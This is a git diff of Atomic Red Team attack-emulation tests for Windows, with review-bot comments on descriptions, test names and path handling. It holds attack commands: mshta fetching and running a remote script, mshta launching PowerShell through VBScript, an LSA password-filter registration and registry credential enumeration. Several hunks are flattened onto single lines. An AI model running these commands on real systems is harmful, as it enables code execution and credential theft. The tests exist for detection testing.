diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index ca2d3c74..ba9e41e4 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -5,8 +5,7 @@ display_name: Mshta
 atomic_tests:
 - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
   description: |
-    Test execution of a remote script using mshta.exe
-    Upon execution calc.exe will be launched
+    Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
   supported_platforms:
   - windows
   input_arguments:
@@ -20,39 +19,21 @@ atomic_tests: command: | mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); -- name: Mshta calls a local VBScript file to launch notepad.exe - description: Tests execution of a local program by a VBScript file called by Mshta - - supported_platforms: - - windows - - input_arguments: - local_file_path: - description: Create a local VBScript file - type: path - default: C:\Temp\mshta_notepad.vbs - - executor: - name: command_prompt - command: | - mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)") - - name: Mshta executes VBScript to execute malicious command description: | - Run a local VB script to run local user enumeration powershell command - + Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. + Upon execution, a new PowerShell windows will be opened that displays user information. supported_platforms: - windows executor: name: command_prompt command: | - mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close") + mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1170\src\powershell.ps1"":close") - name: Mshta Executes Remote HTML Application (HTA) description: | - Execute an arbitrary remote HTA. - Upon execution calc.exe will be launched + Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. supported_platforms: - windows input_arguments:
diff --git a/atomics/T1174/T1174.yaml b/atomics/T1174/T1174.yaml
index f655892d..83bc90d3 100644
--- a/atomics/T1174/T1174.yaml
+++ b/atomics/T1174/T1174.yaml
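Review bot: The new `command` line drops the `$` from `$PathToAtomicsFolder`, so the path given to `powershell -noexit -file` now works only if the runner replaces the bare `PathToAtomicsFolder` token before the string reaches mshta; presumably that is the intent, but a runner that does not perform the substitution hands PowerShell a relative path resolved from mshta's working directory and the spawned window shows nothing but a file-not-found error. Worth stating in the description, e.g. `PathToAtomicsFolder is replaced by the execution framework; run this test through it rather than pasting the command by hand.` The second added description line, `a new PowerShell windows will be opened`, should read `window`. The hunk also removes the local-VBScript notepad test without any trace of the reason; a sentence in the commit message would save the next reader from re-adding it.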
@@ -34,4 +34,4 @@ atomic_tests:
       $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
       $notificationPackagesValues += $passwordFilterName
       Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
-      Restart-Computer -Confirm
\ No newline at end of file
+      Restart-Computer -Confirm
diff --git a/atomics/T1204/T1204.yaml b/atomics/T1204/T1204.yaml
index 3f7403ae..e70aaae9 100644
--- a/atomics/T1204/T1204.yaml
+++ b/atomics/T1204/T1204.yaml
@@ -5,7 +5,7 @@ display_name: User Execution atomic_tests: - name: OSTap Style Macro Execution description: | - This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe. + This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
@@ -79,7 +79,7 @@ atomic_tests: - name: Maldoc choice flags command execution description: | - This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders + This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. supported_platforms:
@@ -118,6 +118,7 @@ atomic_tests: - name: OSTAP JS version description: | Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript + Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. supported_platforms:
diff --git a/atomics/T1214/T1214.yaml b/atomics/T1214/T1214.yaml
index d722f70b..23e94561 100644
--- a/atomics/T1214/T1214.yaml
+++ b/atomics/T1214/T1214.yaml
@@ -5,7 +5,7 @@ display_name: Credentials in Registry atomic_tests: - name: Enumeration for Credentials in Registry description: | - Queries to enumerate for credentials in the Registry. + Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. supported_platforms: - windows
@@ -19,7 +19,8 @@ atomic_tests: - name: Enumeration for PuTTY Credentials in Registry description: | - Queries to enumerate for PuTTY credentials in the Registry. + Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry + entries are found, they will be displayed. supported_platforms: - windows
diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml
index 6aa42647..42abe051 100644
--- a/atomics/T1216/T1216.yaml
+++ b/atomics/T1216/T1216.yaml
@@ -25,6 +25,7 @@ atomic_tests: - name: SyncAppvPublishingServer Signed Script PowerShell Command Execution description: | Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. + Upon execution, calc.exe will be launched. supported_platforms: - windows
diff --git a/atomics/T1217/T1217.yaml b/atomics/T1217/T1217.yaml
index 5ada6e07..ef1de2af 100644
--- a/atomics/T1217/T1217.yaml
+++ b/atomics/T1217/T1217.yaml
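Review bot: The added sentence `PuTTY must be installed for this test to work.` in the T1214 `@@ -19,7 +19,8` hunk records a prerequisite only in prose, where no runner can act on it, so an unmet condition produces an empty result that looks like a pass. If the schema this file targets already supports a `dependencies` stanza with a `prereq_command`, a check for PuTTY's presence belongs there and the description can say the runner verifies it; otherwise keep the sentence but put it on its own line so the behaviour statement `If any registry entries are found, they will be displayed.` stays separate. The executor of this test lies outside the hunk, so the exact registry path being queried cannot be confirmed here.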
@@ -42,6 +42,7 @@ atomic_tests: - name: List Google Chrome Bookmarks on Windows with powershell description: | Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. + Upon execution, paths that contain bookmark files will be displayed. supported_platforms: - windows
@@ -49,11 +50,12 @@ atomic_tests: executor: name: powershell command: | - where.exe /R C:\Users\ Bookmarks + Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force -- name: List Google Chrome Bookmarks on Windows with command prompt +- name: List Google Chrome Bookmarks on Windows with command prompt. description: | Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. + Upon execution, paths that contain bookmark files will be displayed. supported_platforms: - windows
@@ -61,4 +63,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      where /R C:\Users\ Bookmarks
+      where /R C:\Users\ Bookmarks
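Review bot: The added line `- name: List Google Chrome Bookmarks on Windows with command prompt.` in the `@@ -49,11 +50,12` hunk introduces a trailing period that no sibling test name carries, and because the name is the handle runners such as Invoke-AtomicTest's `-TestNames` use to select a test, the period becomes part of the identifier; it should be `- name: List Google Chrome Bookmarks on Windows with command prompt`. In the replacement `Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force`, `-ErrorAction SilentlyContinue` also swallows access-denied errors on other users' profiles, so the new description sentence `paths that contain bookmark files will be displayed` holds only for profiles the executing account can read; a short qualifier such as `for profiles the current user can read` would keep the description accurate and explain why running elevated changes the output. `-Force` is what pulls hidden profile directories into the search and deserves a word in the description as well.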